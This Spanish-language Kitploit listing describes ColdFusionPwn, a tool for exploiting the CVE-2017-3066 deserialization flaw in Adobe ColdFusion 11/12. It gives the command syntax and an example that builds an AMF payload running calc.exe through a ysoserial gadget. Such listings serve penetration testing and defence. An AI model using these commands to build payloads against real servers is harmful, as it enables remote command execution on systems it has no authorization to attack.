Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ColdFusionPwn — Herramienta de explotación para CVE-2017-3066 dirigida a Adobe Coldfusion 11/12 | Kitploit
Herramientas/GitHubGitHub/codewhitesec/coldfusionpwn
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubcodewhitesec/coldfusionpwn

ColdFusionPwn

Herramienta de explotación para CVE-2017-3066 dirigida a Adobe Coldfusion 11/12

Ver Repositorio
9529hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ColdFusionPwn

Herramienta de explotación para CVE-2017-3066 dirigida a Adobe Coldfusion 11/12.

Descripción

La herramienta permite generar payloads AMF serializados para explotar la validación de entrada faltante de clases permitidas. Para más detalles, consulte nuestro artículo en el blog.

Instalación

Obtenga la última versión de ysoserial. Obtenga ColdFusionPwn desde lanzamientos.

Uso

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
root@kitploit:~
- [-s|-e]         Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type]  ysoserial gadget payload 
- [command]       command to be executed
- [outfile]       output file for the generated payload

Es necesario tener ColdFusionPwn-0.0.1-SNAPSHOT-all.jar como primera entrada en el classpath, ya que la biblioteca ApacheCommons BeanUtils incluida con ysoserial es más nueva (y tiene un uid de serialversion diferente).

Ejemplos

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
Descargar herramienta